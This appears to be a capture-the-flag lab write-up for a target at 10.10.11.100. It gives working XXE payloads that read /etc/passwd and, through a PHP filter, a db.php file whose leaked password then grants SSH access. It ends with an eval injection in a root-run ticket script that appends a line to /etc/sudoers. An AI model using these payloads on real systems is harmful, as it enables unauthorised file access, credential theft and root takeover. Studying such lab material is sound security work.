We have XML injection here http://10.10.11.100/log_submit.php
 

I capture the request in burp, the data we enter is sent after data= then it is base64 encoded and url encoded(key characters only)

Where we put &xxe; we get the injection. We tested this with /etc/passwd.

data=<?xml  version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

<bugreport>

<title>&xxe;</title>

<cwe>hack</cwe>

<cvss>hack</cvss>

<reward>20</reward>

</bugreport>

Base64 payload

PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4NCjwhRE9DVFlQRSBmb28gWyA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPiBdPg0KCQk8YnVncmVwb3J0Pg0KCQk8dGl0bGU%2bJnh4ZTs8L3RpdGxlPg0KCQk8Y3dlPmhhY2s8L2N3ZT4NCgkJPGN2c3M%2baGFjazwvY3Zzcz4NCgkJPHJld2FyZD4yMDwvcmV3YXJkPg0KCQk8L2J1Z3JlcG9ydD4%3d

we can read the db.php file we found using php filters

<?xml  version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=db.php"> ]>

<bugreport>

<title>&xxe;</title>

<cwe>hack</cwe>

<cvss>hack</cvss>

<reward>20</reward>

</bugreport>

We dump the db file using the payload above

<?php

// TODO -> Implement login system with the database.

$dbserver = "localhost";

$dbname = "bounty";

$dbusername = "admin";

$dbpassword = "m19RoAU0hP41A1sTsq6K";

$testuser = "test";

?>

We can ssh in with

development:m19RoAU0hP41A1sTsq6K

We can run a ticket creation python script as root. The script has an eval function that we can exploit.

I create a test file named test.md
 

# Skytrain Inc Ticket

## Ticket to Destination: London

__Ticket Code:__

**32+110+43+ __import__('os').system('whoami')**

I make a script to echo development into the sudoers folder so I can su to root.

**32+110+43+ __import__('os').system('echo "development ALL=(ALL) ALL" >> /etc/sudoers')**